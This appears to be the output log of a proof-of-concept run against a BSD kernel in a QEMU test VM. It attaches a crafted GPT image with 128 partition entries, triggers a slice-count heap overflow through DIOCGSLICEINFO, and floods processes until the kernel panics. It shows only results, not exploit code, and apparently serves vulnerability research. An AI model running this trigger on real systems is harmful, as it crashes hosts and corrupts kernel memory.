DF-0074 / run.log
=== attaching crafted GPT image (128 entries) to vn0 ===
attach rc=0
/dev/vn0
/dev/vn0s0
/dev/vn0s1
/dev/vn0s10
/dev/vn0s11
/dev/vn0s12
/dev/vn0s13
/dev/vn0s14
/dev/vn0s15
/dev/vn0s16
/dev/vn0s2
/dev/vn0s3
/dev/vn0s4
/dev/vn0s5
/dev/vn0s6
/dev/vn0s7
/dev/vn0s8
/dev/vn0s9
=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ===
DIOCGSLICEINFO returned nslices=130
trigger rc=0
=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ===
[0] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[1] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[2] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[3] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[4] DIOCGSLICEINFO returned nslices=130 (overflow happened)
fork/exit churn to force fdfree slab validation...
stress done; if we got here, no synchronous panic this run.
stress rc=0
=== parallel flood (16 procs) to churn slab zones hit by the overrun ===
------------------------------------------------------------------------
NOTE: output ends here because the SSH session was killed (exit 124 /
Connection lost) when the kernel panicked during the parallel flood.
The trigger had already returned nslices=130 five times in the stress
section above, proving the 28 KB heap overflow executed. The panic
signature for this run ("panic: slaballoc: corrupted zone" /
"Fatal trap 12 ... slab_cleanup", depending on heap layout) is in
panic.txt, captured from dfbsd-qemu/boot.log. vm.sh status => down
immediately after. Reproduced across three fresh-boot runs (vm.sh reset).
------------------------------------------------------------------------